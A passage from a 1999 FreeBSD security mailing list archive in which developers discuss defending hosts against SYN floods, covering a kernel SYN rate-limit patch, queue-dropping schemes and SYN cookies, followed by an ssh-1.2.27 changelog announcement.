hz) { + if (lpackets > synlim) + printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); + lticks = ticks; + lpackets = 0; + } + + /* + * bump packet count + */ + + if (++lpackets > synlim) { + return(-1); + } + + return(0); + } + #endif + static int tcp_reass(tp, ti, m) register struct tcpcb *tp; *************** *** 379,384 **** --- 427,438 ---- ip_fw_fwd_addr = NULL; } else #endif /* IPFIREWALL_FORWARD */ + + #ifdef SYN_RATELIM + if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) + if (syn_ratelim() < 0) + goto drop; + #endif inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, ti->ti_dst, ti->ti_dport, 1); --=====================_194487001==_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 18:28:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id AE91D1522E for ; Thu, 13 May 1999 18:28:06 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4467 invoked from network); 14 May 1999 01:28:05 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 01:28:05 -0000 Date: Thu, 13 May 1999 18:27:13 -0700 (PDT) From: Thamer Al-Herbish To: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <4.2.0.37.19990513161529.00c1e3f0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 13 May 1999, Brett Glass wrote: > available (default to 100). This is the maximium number of SYNs per second > that will be processed, the rest will be silently discarded. On my test If I'm reading this correctly, it would not be very effective. I believe the OpenBSD fix was to randomly drop ports per a syn flooded port. So it would be "fair." Dropping all SYNs after a number of SYNs come in seems to be counter productive. Or does this actually work? -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:21:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id D6C8614BE7 for ; Thu, 13 May 1999 19:21:09 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id WAA25273; Thu, 13 May 1999 22:21:33 -0400 (envelope-from jared) Date: Thu, 13 May 1999 22:21:33 -0400 From: Jared Mauch To: Thamer Al-Herbish Cc: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Message-ID: <19990513222133.A23982@puck.nether.net> Mail-Followup-To: Thamer Al-Herbish , security@FreeBSD.ORG References: <4.2.0.37.19990513161529.00c1e3f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Thamer Al-Herbish on Thu, May 13, 1999 at 06:27:13PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What would be ideal is to have a fair-queue such as this: real-queue = 16 extended-queue = 32 once the real-queue fills with syns, fill the extended queue, (these are folks that need syn-ack, btw), once the extended queue fills, begin sequentially dropping elements from the real-queue index++; index = index%16; drop(real_q[index]); move(real_q[index], extend_q[index]); (making extend_q[index] avail for the current syn to be put in) and sequentially add elements from index on if there is nothing in extend_q[index], you should not need to drop real_q[index] (I picked 16 & 32 as arbitary numbers, those can obviously be any size, preferably equal); Obviously, doing prefered drops (based on dst port on our side), ie: we have 200 syns for port 80, but only 3 for port 22, deal with the 3 that are not causing a problem first, so we can get ssh in, but let the web folks go a bit slower. Doing truly random drops are always better, but on the average server will induce more load than you'll save (IMHO). - jared On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: > On Thu, 13 May 1999, Brett Glass wrote: > > > available (default to 100). This is the maximium number of SYNs per second > > that will be processed, the rest will be silently discarded. On my test > > If I'm reading this correctly, it would not be very effective. I > believe the OpenBSD fix was to randomly drop ports per a syn flooded > port. So it would be "fair." Dropping all SYNs after a number of SYNs > come in seems to be counter productive. > > Or does this actually work? > > -- > Thamer Al-Herbish PGP public key: > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:29:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 492BA14BE7 for ; Thu, 13 May 1999 19:29:51 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id UAA20729; Thu, 13 May 1999 20:29:40 -0600 (MDT) Message-Id: <4.2.0.37.19990513202450.0444fca0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Thu, 13 May 1999 20:29:38 -0600 To: Jared Mauch , Thamer Al-Herbish From: Brett Glass Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Cc: security@FreeBSD.ORG In-Reply-To: <19990513222133.A23982@puck.nether.net> References: <4.2.0.37.19990513161529.00c1e3f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How often are the IP addresses spoofed during SYN floods? (I know it's perfectly practical to do so, since the flooder doesn't care about responses, but routers may preclude it.) It could be that discarding SYNS from addresses that send excessive numbers of them would let the legitimate folk keep working. As a backup, there could also be a random discard mechanism. --Brett At 10:21 PM 5/13/99 -0400, Jared Mauch wrote: > What would be ideal is to have a fair-queue such as this: > > real-queue = 16 > extended-queue = 32 > > once the real-queue fills with syns, fill the extended >queue, (these are folks that need syn-ack, btw), once the >extended queue fills, begin sequentially dropping elements from the >real-queue > > index++; > index = index%16; > drop(real_q[index]); > move(real_q[index], extend_q[index]); > (making extend_q[index] avail for the current syn to be put in) > > and sequentially add elements from index on > > if there is nothing in extend_q[index], you should not need >to drop real_q[index] > > (I picked 16 & 32 as arbitary numbers, those can obviously >be any size, preferably equal); > > Obviously, doing prefered drops (based on dst port on our side), >ie: we have 200 syns for port 80, but only 3 for port 22, deal with the >3 that are not causing a problem first, so we can get ssh in, but let the >web folks go a bit slower. > > Doing truly random drops are always better, but on the average server >will induce more load than you'll save (IMHO). > > - jared > >On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: > > On Thu, 13 May 1999, Brett Glass wrote: > > > > > available (default to 100). This is the maximium number of SYNs per second > > > that will be processed, the rest will be silently discarded. On my test > > > > If I'm reading this correctly, it would not be very effective. I > > believe the OpenBSD fix was to randomly drop ports per a syn flooded > > port. So it would be "fair." Dropping all SYNs after a number of SYNs > > come in seems to be counter productive. > > > > Or does this actually work? > > > > -- > > Thamer Al-Herbish PGP public key: > > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > >-- >Jared Mauch | pgp key available via finger from jared@puck.nether.net >clue++; | http://puck.nether.net/~jared/ My statements are only mine. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:38:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 7A7C214BE7 for ; Thu, 13 May 1999 19:38:39 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4588 invoked from network); 14 May 1999 02:38:37 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 02:38:37 -0000 Date: Thu, 13 May 1999 19:37:44 -0700 (PDT) From: Thamer Al-Herbish To: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <19990513222133.A23982@puck.nether.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 13 May 1999, Jared Mauch wrote: > What would be ideal is to have a fair-queue such as this: > > real-queue = 16 > extended-queue = 32 > > once the real-queue fills with syns, fill the extended > queue, (these are folks that need syn-ack, btw), once the > extended queue fills, begin sequentially dropping elements from the > real-queue I don't see you mentioning why its more fair? Are you assuming that the real queue will most likely have bogus packets? If the bogus syn packets are coming in faster than the real ones you'll wind up kicking off all the real ones. I'm assuming the random dropping will be more fair because in time you'll eventually respond to a real SYNs in the face of a storm of bogus SYNs. Btw, if it matters any I liked Bernstein's syn cookies. The only conceivable problem there was storing initial TCP option information which could not be done because of the cookie-response design. Quick summary of syn cookies: You would send back a cookie as one the sequence number based on a secret that changes every so often hashed with the clients initial sequence number. If you get back a SYN-ACK, you check it against the same hash, and a match means you can respond and finish the handshake. You effectively _never_ store information about the first SYNs and thus _never_ have to worry about resources. TCBs are created after the hand shake is completed. > Obviously, doing prefered drops (based on dst port on our side), > ie: we have 200 syns for port 80, but only 3 for port 22, deal with the > 3 that are not causing a problem first, so we can get ssh in, but let the > web folks go a bit slower. Why not deal with them both? In both instances you either accept or drop incoming SYNs. It doesn't cost you more to handle both unless you're talking about CPU cycles with which the added overhead of not handling would be insignificant. Or are you assuming otherwise? -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:40:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 2932A1541B for ; Thu, 13 May 1999 19:40:10 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id WAA25919; Thu, 13 May 1999 22:40:39 -0400 (envelope-from jared) Date: Thu, 13 May 1999 22:40:39 -0400 From: Jared Mauch To: Brett Glass Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Message-ID: <19990513224039.A25812@puck.nether.net> Mail-Followup-To: Brett Glass , Thamer Al-Herbish , security@FreeBSD.ORG References: <4.2.0.37.19990513161529.00c1e3f0@localhost> <19990513222133.A23982@puck.nether.net> <4.2.0.37.19990513202450.0444fca0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <4.2.0.37.19990513202450.0444fca0@localhost>; from Brett Glass on Thu, May 13, 1999 at 08:29:38PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 13, 1999 at 08:29:38PM -0600, Brett Glass wrote: > How often are the IP addresses spoofed during SYN floods? (I know Most often, that's why you get your syn-ack holding queue so large, you ack the forged syn, making it impossible to get the rest of the tcp handshake going, as there is no machine, therefore hogging your system resources. > it's perfectly practical to do so, since the flooder doesn't > care about responses, but routers may preclude it.) > > It could be that discarding SYNS from addresses that send excessive > numbers of them would let the legitimate folk keep working. Yes, this would be good. > As a backup, there could also be a random discard mechanism. This is necessary for the syn-attack issue, or at least something pseudo-random, for both the syn-q and the syn-ack-q - jared > At 10:21 PM 5/13/99 -0400, Jared Mauch wrote: > > What would be ideal is to have a fair-queue such as this: > > > > real-queue = 16 > > extended-queue = 32 > > > > once the real-queue fills with syns, fill the extended > >queue, (these are folks that need syn-ack, btw), once the > >extended queue fills, begin sequentially dropping elements from the > >real-queue > > > > index++; > > index = index%16; > > drop(real_q[index]); > > move(real_q[index], extend_q[index]); > > (making extend_q[index] avail for the current syn to be put in) > > > > and sequentially add elements from index on > > > > if there is nothing in extend_q[index], you should not need > >to drop real_q[index] > > > > (I picked 16 & 32 as arbitary numbers, those can obviously > >be any size, preferably equal); > > > > Obviously, doing prefered drops (based on dst port on our side), > >ie: we have 200 syns for port 80, but only 3 for port 22, deal with the > >3 that are not causing a problem first, so we can get ssh in, but let the > >web folks go a bit slower. > > > > Doing truly random drops are always better, but on the average server > >will induce more load than you'll save (IMHO). > > > > - jared > > > >On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: > > > On Thu, 13 May 1999, Brett Glass wrote: > > > > > > > available (default to 100). This is the maximium number of SYNs per second > > > > that will be processed, the rest will be silently discarded. On my test > > > > > > If I'm reading this correctly, it would not be very effective. I > > > believe the OpenBSD fix was to randomly drop ports per a syn flooded > > > port. So it would be "fair." Dropping all SYNs after a number of SYNs > > > come in seems to be counter productive. > > > > > > Or does this actually work? > > > > > > -- > > > Thamer Al-Herbish PGP public key: > > > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > > > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > >-- > >Jared Mauch | pgp key available via finger from jared@puck.nether.net > >clue++; | http://puck.nether.net/~jared/ My statements are only mine. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 19:42:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 4FC4E1536B for ; Thu, 13 May 1999 19:42:06 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4608 invoked from network); 14 May 1999 02:42:05 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 02:42:05 -0000 Date: Thu, 13 May 1999 19:41:12 -0700 (PDT) From: Thamer Al-Herbish To: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <4.2.0.37.19990513202450.0444fca0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 13 May 1999, Brett Glass wrote: > How often are the IP addresses spoofed during SYN floods? (I know > it's perfectly practical to do so, since the flooder doesn't > care about responses, but routers may preclude it.) Completely arbitrary. I could literally send out thousands as long as I know they are unreachable. I could use, say 10 different addresses and make a zillion packets. Bandwidth and my imagination are the only barriers. > It could be that discarding SYNS from addresses that send excessive > numbers of them would let the legitimate folk keep working. Yes, but it will be worthless against syn flooders. Keep in mind that you want an unreachable address: the returned SYN-ACK is irrelevant. -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 21:38:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 6129C154AD for ; Thu, 13 May 1999 21:38:24 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id VAA97604; Thu, 13 May 1999 21:38:16 -0700 (PDT) (envelope-from dillon) Date: Thu, 13 May 1999 21:38:16 -0700 (PDT) From: Matthew Dillon Message-Id: <199905140438.VAA97604@apollo.backplane.com> To: Brett Glass Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD References: <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :How often are the IP addresses spoofed during SYN floods? (I know :it's perfectly practical to do so, since the flooder doesn't :care about responses, but routers may preclude it.) : :It could be that discarding SYNS from addresses that send excessive :numbers of them would let the legitimate folk keep working. : :As a backup, there could also be a random discard mechanism. : :--Brett IP addresses are usually spoofed during SYN Floods. They are typically either random or sequentially incrementing. The newer flooding programs randomize the source IP address. It is impossible to tell the difference between a SYN spoof and a real SYN. Putting code in to handle excessive SYNs from a particular IP address is a waste of time, IMHO. The only way to fix a SYN flood is for routers to automatically test the source IP against the source interface on a global scale. The only way to mitigate the SYN flooding problem on the host side is to greatly increase the size of the listen queue, but even this does not work too well. -Matt Matthew Dillon :At 10:21 PM 5/13/99 -0400, Jared Mauch wrote: :> What would be ideal is to have a fair-queue such as this: :> :> real-queue = 16 :> extended-queue = 32 :> :> once the real-queue fills with syns, fill the extended :>queue, (these are folks that need syn-ack, btw), once the :>extended queue fills, begin sequentially dropping elements from the :>real-queue :> :> index++; :> index = index%16; :> drop(real_q[index]); :> move(real_q[index], extend_q[index]); :> (making extend_q[index] avail for the current syn to be put in) :> :> and sequentially add elements from index on :> :> if there is nothing in extend_q[index], you should not need :>to drop real_q[index] :> :> (I picked 16 & 32 as arbitary numbers, those can obviously :>be any size, preferably equal); :> :> Obviously, doing prefered drops (based on dst port on our side), :>ie: we have 200 syns for port 80, but only 3 for port 22, deal with the :>3 that are not causing a problem first, so we can get ssh in, but let the :>web folks go a bit slower. :> :> Doing truly random drops are always better, but on the average server :>will induce more load than you'll save (IMHO). :> :> - jared :> :>On Thu, May 13, 1999 at 06:27:13PM -0700, Thamer Al-Herbish wrote: :> > On Thu, 13 May 1999, Brett Glass wrote: :> > :> > > available (default to 100). This is the maximium number of SYNs per second :> > > that will be processed, the rest will be silently discarded. On my test :> > :> > If I'm reading this correctly, it would not be very effective. I :> > believe the OpenBSD fix was to randomly drop ports per a syn flooded :> > port. So it would be "fair." Dropping all SYNs after a number of SYNs :> > come in seems to be counter productive. :> > :> > Or does this actually work? :> > :> > -- :> > Thamer Al-Herbish PGP public key: :> > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt :> > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] :> > :> > :> > :> > To Unsubscribe: send mail to majordomo@FreeBSD.org :> > with "unsubscribe freebsd-security" in the body of the message :> :>-- :>Jared Mauch | pgp key available via finger from jared@puck.nether.net :>clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 22:26:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 71B90154C8 for ; Thu, 13 May 1999 22:26:49 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id HAA20794; Fri, 14 May 1999 07:25:46 +0200 (CEST) Message-ID: <19990514072546.A20779@foobar.franken.de> Date: Fri, 14 May 1999 07:25:46 +0200 From: Harold Gutch To: Matthew Dillon , Brett Glass Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD References: <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905140438.VAA97604@apollo.backplane.com>; from Matthew Dillon on Thu, May 13, 1999 at 09:38:16PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 13, 1999 at 09:38:16PM -0700, Matthew Dillon wrote: > The only way to mitigate the SYN flooding problem on the host side is to > greatly increase the size of the listen queue, but even this does not work > too well. > What about the Linux way of doing it, that is by creating an MD5-hash over the source- and destination IP and port and a secret which is incremented say every minute and using the result as a base for the own sequencenumber. You don't lose a socket before you get the third handshake packet and you can verify the sequencenumber using MD5 again. I found this idea to be quite interesting when reading about it the first time, and I currently don't see any negative side effects from it. The FreeBSD approach (just discarding the oldest socket in SYN_RCVD state when the backlog gets too high) works often enough aswell, but might cause problems if the flooder sends you more SYNs than your backlog can handle in a shorter timeframe than your SYN|ACK needs for it's way back to somebody who tries to establish a normal connection and his answer back to you takes. bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 22:46:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 5583B152A3 for ; Thu, 13 May 1999 22:46:25 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id WAA25855; Thu, 13 May 1999 22:46:12 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id WAA18480; Thu, 13 May 1999 22:46:10 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id WAA06542; Thu, 13 May 1999 22:46:09 -0700 (PDT) From: Don Lewis Message-Id: <199905140546.WAA06542@salsa.gv.tsc.tdk.com> Date: Thu, 13 May 1999 22:46:09 -0700 In-Reply-To: Thamer Al-Herbish "Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD" (May 13, 7:37pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 13, 7:37pm, Thamer Al-Herbish wrote: } Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD } Btw, if it matters any I liked Bernstein's syn cookies. The only } conceivable problem there was storing initial TCP option information } which could not be done because of the cookie-response design. } } Quick summary of syn cookies: } } You would send back a cookie as one the sequence number based on a } secret that changes every so often hashed with the clients initial } sequence number. If you get back a SYN-ACK, you check it against the } same hash, and a match means you can respond and finish the } handshake. You effectively _never_ store information about the first } SYNs and thus _never_ have to worry about resources. TCBs are } created after the hand shake is completed. One potential danger is that you can't totally block incoming connections to vulnerable ports by filtering out incoming SYN packets. If an attacker can guess what sequence number you would have sent in a SYN-ACK, he can establish a connection by just sending the third packet in the initial three-way handshake. This isn't especially easy to brute force because the sequence space is a 32 bit number, but it's not totally unreasonable either if the attacker is patient enough. The attacker may also be able to make better guesses if he knows the details of the implementation he is attacking. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 13 22:53:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 31EB01527B for ; Thu, 13 May 1999 22:53:36 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 4901 invoked from network); 14 May 1999 05:53:30 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 14 May 1999 05:53:30 -0000 Date: Thu, 13 May 1999 22:52:38 -0700 (PDT) From: Thamer Al-Herbish To: security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD In-Reply-To: <199905140546.WAA06542@salsa.gv.tsc.tdk.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 13 May 1999, Don Lewis wrote: > to vulnerable ports by filtering out incoming SYN packets. If an attacker > can guess what sequence number you would have sent in a SYN-ACK, he can > establish a connection by just sending the third packet in the initial > three-way handshake. This isn't especially easy to brute force because The syn-cookie work around does not make it any easier to guess the sequence number. You would need the actual secret that changes every so often to come up with it. This secret is hashed with the ISN from the packet and the addresses on the packet. Knowing the ISN and the addresses is irrelevant because the hash is not reversible. Unless the interval where the secret would change was exceptionally long, it is doubtful you can crack a 32-bit secret. My understanding of the syn cookie mechanism leads me to believe that is not possible to brute force it with conventional computer power. Maybe in a few years with faster computers it would be. -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 2:16:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id DAC2B15431 for ; Fri, 14 May 1999 02:16:43 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 61493 invoked by uid 1001); 14 May 1999 09:16:42 +0000 (GMT) To: freebsd-security@freebsd.org Subject: ssh-1.2.27 is out From: sthaug@nethelp.no X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Fri, 14 May 1999 11:16:42 +0200 Message-ID: <61491.926673402@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just FYI: ssh-1.2.27 is out. These are the updates relative to 1.2.26, according to the ChangeLog. Steinar Haug, Nethelp consulting, sthaug@nethelp.no ---------------------------------------------------------------------- Thu Apr 29 10:46:21 1999 Timo J. Rinne * Replaced OSF1/C2 security support with more complete SIA (Security Integration Architecture). Mon Feb 22 10:00:12 1999 Timo J. Rinne * Added snprintf from ssh2. * Tatu's sprintf -> snprintf fixes. * Fixed potential buffer overflows. * Kerberos authentication disabled, if client is suid-root. This is the only way to avoid security problems that are in Kerberos rather than in ssh. Wed Nov 25 00:04:11 1998 Tatu Ylonen * sshd.c (sgi_project_setup): patches from Luigi Pugnetti , Eivind Gjelseth , Randolph J. Herber , Sevo Stille . * sshd.c (sgi_project_acct_on): patches from Vern Staats, staatsvr@asc.hpc.mil. * sshd.c (login_permitted): Added support for locked accounts on AIX. Thanks to "Delius, Felix von" . * login.c: Improvements for glibc 2.0.100+ from D.A. Harris . Tue Nov 24 23:27:20 1998 Tatu Ylonen * login.c: Removed assignment to ux.ut_exit.e_{termination,exit}, because they are already zeroed and the assignment is causing problems on some platforms. * Fixed uninitialized variable err in sgi_project_setup (from Eivind Gjelseth ). * ssh-agent.c: Fixed -D (from Ian Goldberg ). * Fixed undefined __udiv_qrnnd bug on Solaris (reported by Karl Berry ). * Fixed a bug in idle timeouts (reported by "David M. Dandarnobody"@nowhere). * Fixed deattack.c on Cray (patch from Andreas Schott ). * Fixed x11 forwarding on SunOS 4.1.4 (gethostbyname bug, reported by Bradford Hull . * Added snprintf from ssh2. Changed most sprintfs to snprintf. * Fixed a hard-to-exploit security bug in Kerberos code. * Added length limitations in manu sprintfs. Mon Jul 13 16:23:15 1998 Tero Kivinen * Removed extra ux.ut_syslen setting. Reported by Felix von Leitner . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 10:38: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 326E114C3C; Fri, 14 May 1999 10:37:54 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id NAA03605; Fri, 14 May 1999 13:37:49 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma003020; Fri, 14 May 99 13:37:03 -0400 Date: Fri, 14 May 1999 13:36:36 -0400 (EDT) From: Seth Subject: SYN floods against FreeBSD (fwd) To: freebsd-stable@freebsd.org Cc: security@freebsd.org Message-id: Content-id: MIME-version: 1.0 Content-type: 